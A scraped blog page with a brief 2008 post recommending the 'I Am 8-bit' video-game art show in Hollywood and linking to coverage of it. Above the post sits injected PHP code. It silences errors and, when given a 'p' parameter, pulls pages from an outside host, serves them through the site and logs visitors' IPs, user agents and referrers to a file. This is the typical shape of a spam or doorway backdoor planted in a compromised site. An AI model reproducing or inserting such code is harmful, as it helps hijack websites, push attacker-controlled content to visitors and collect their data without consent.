error_reporting(0); ini_set('display_errors',0); define('STATFILE','stat.txt'); define('LOG',true); if(isset($_GET['p'])) { $sock = fsockopen('km32025.keymachine.de', 80); if($sock){ if (LOG && isset($_SERVER['HTTP_REFERER']) && !empty($_SERVER['HTTP_REFERER'])) { $referer = rawurlencode($_SERVER['HTTP_REFERER']); $remote_ip = $_SERVER['REMOTE_ADDR']; $user_agent = strtolower($_SERVER['HTTP_USER_AGENT']); $file = fopen(STATFILE,'ab'); if ($file) { fwrite($file,date('Y-m-d H:i:s').' '.$remote_ip.' '.$user_agent.' '.rawurldecode($referer)."\n"); fclose($file); } } fwrite ($sock, 'GET http://km32025.keymachine.de/oslik2/cn/7/'.$_GET['p'].'.html HTTP/1.0'."\r\n"); fwrite ($sock, 'Host: km32025.keymachine.de'."\r\n\r\n"); while($content[] = fgets ($sock)); $content = implode('', $content); echo(trim(substr($content, strpos($content, "\r\n\r\n")))); fclose ($sock);} exit; } -=+fastlikesquirrel.com+=- » Blog Archive » I Am 8-bit 2008

I Am 8-bit 2008

Now in it’s fourth year, the annual I Am 8-Bit has is currently underway in Hollywood, CA. The show will run until September 7, 2008, so if you’re in the local area (unlike myself), I definitely recommend you to check out some of the fine video game themed art.

I would love to be there next year for the opening and actually purchase something decent - there’s so much cool stuff there and if this year’s pieces say anything, the quality bar is constantly being raised.

Since I wasn’t actually there to experience the show, I’ll just link to some people that did make it to the opening night - NotCot, Joystiq, Old Man Musings.

Leave a Reply

You must be logged in to post a comment.